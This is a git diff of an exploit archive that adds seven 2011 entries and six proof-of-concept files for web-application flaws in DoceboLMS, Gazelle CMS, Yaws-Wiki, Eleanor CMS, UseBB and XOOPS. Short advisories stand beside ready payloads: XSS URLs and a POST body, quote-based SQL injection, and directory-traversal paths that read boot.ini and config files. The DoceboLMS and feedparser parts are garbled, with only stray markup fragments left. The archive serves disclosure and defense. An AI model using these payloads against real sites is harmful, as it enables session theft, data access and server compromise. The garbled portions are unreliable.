diff --git a/files.csv b/files.csv index 620272643..cd08cc309 100755 --- a/files.csv +++ b/files.csv @@ -32028,3 +32028,10 @@ id,file,description,date,author,platform,type,port 35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 'link' Parameter Cross Site Scripting Vulnerability",2011-04-04,"John Leitch",php,webapps,0 35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 'ajax_action' Parameter Cross Site Scripting Vulnerability",2011-04-03,"John Leitch",php,webapps,0 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 'index.php' Arbitrary File Download Vulnerability",2011-04-03,KedAns-Dz,windows,remote,0 +35564,platforms/php/webapps/35564.txt,"DoceboLMS 4.0.4 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 +35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 Cross Site Scripting and SQL Injection Vulnerabilities",2011-04-04,"kurdish hackers team",php,webapps,0 +35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 +35567,platforms/php/webapps/35567.txt,"Eleanor CMS Cross Site Scripting and Multiple SQL Injection Vulnerabilities",2011-04-05,"High-Tech Bridge SA",php,webapps,0 +35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 'admin.php' Local File Include Vulnerability",2011-04-05,"High-Tech Bridge SA",php,webapps,0 +35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 +35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 'feedparser/feedparser.py' Cross Site Scripting Vulnerability",2011-04-05,fazalmajid,multiple,remote,0 diff --git a/platforms/multiple/remote/35570.txt b/platforms/multiple/remote/35570.txt new file mode 100755 index 000000000..63764fedc --- /dev/null +++ b/platforms/multiple/remote/35570.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/47177/info + + +python-feedparser is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + + + + + + ]]>]]> + + + +DoceboLMS 4.0.4 Multiple Stored XSS Vulnerabilities + + + +

+ +
+ +' /> + + +' /> +
+ +

Exploit PreAssessment Module!



+ +
+ + + + + +' />
+ +

Exploit News Module!



+ + +

Exploit URI XSS #1



+ + +

Exploit URI XSS #2



+ + +

Exploit URI XSS #3



+ + +

Exploit URI XSS #4



+ + diff --git a/platforms/php/webapps/35565.txt b/platforms/php/webapps/35565.txt new file mode 100755 index 000000000..ca4bae186 --- /dev/null +++ b/platforms/php/webapps/35565.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47157/info + +Anantasoft Gazelle CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Anantasoft Gazelle CMS 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/search.php?lookup= +http://www.example.com//register.php?^name=&pass=&controle=&email=&showemail=&save=Save&table=users&active=0&activate=3fb04953d95a94367bb133f862402bce&location=%2FAnanta_Gazelle1.0%2Fregister.php&joindate=2011-04-05+07%3A58%3A50 [is vulnerable to ' input SQL inject] + diff --git a/platforms/php/webapps/35566.txt b/platforms/php/webapps/35566.txt new file mode 100755 index 000000000..d30963991 --- /dev/null +++ b/platforms/php/webapps/35566.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/47158/info + +Yaws-Wiki is prone to multiple cross-site scripting vulnerabilities and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +Yaws-Wiki 1.88-1 is vulnerable; other versions may also be affected. + +Reflective XSS: +http://www.example.com/editTag.yaws?node=ALockedPage&tag=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E +http://www.example.com/showOldPage.yaws?node=home&index=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E +http://www.example.com/allRefsToMe.yaws?node=%3E%3C/pre%3E%3CScRiPt%3Ealert(1)%3C/ScRiPt%3E + +Stored XSS: +http://www.example.com/editPage.yaws?node=home + diff --git a/platforms/php/webapps/35567.txt b/platforms/php/webapps/35567.txt new file mode 100755 index 000000000..6311227ae --- /dev/null +++ b/platforms/php/webapps/35567.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/47164/info + +Eleanor CMS is prone to a cross-site scripting vulnerability and multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Eleanor CMS rc5 is vulnerable; other versions may also be affected. + +SQL injection: + +http://www.example.com/download.php?module=1%27 +http://www.example.com/upload.php?module=1%27 + +Cross-site scripting: + +POST /admin.php HTTP/1.1 + +user_name=111&pass=222&whereform=">&submit=%C2%EE%E9%F2%E8 \ No newline at end of file diff --git a/platforms/php/webapps/35568.txt b/platforms/php/webapps/35568.txt new file mode 100755 index 000000000..bbc9a2346 --- /dev/null +++ b/platforms/php/webapps/35568.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47166/info + +UseBB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible. + +UseBB 1.0.11 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php?act=/../../config \ No newline at end of file diff --git a/platforms/php/webapps/35569.txt b/platforms/php/webapps/35569.txt new file mode 100755 index 000000000..ecf95e8e0 --- /dev/null +++ b/platforms/php/webapps/35569.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/47174/info + +XOOPS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker can exploit these vulnerabilities to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +XOOPS 2.5.0 is vulnerable; other versions may also be affected. + +http://www.example.com/banners.php?click=../../../../../../../boot.ini%00 +http://www.example.com/banners.php?click&url=../../../../../../../boot.ini%00 +http://www.example.com/banners.php?click&bid=../../../../../../../boot.ini%00 \ No newline at end of file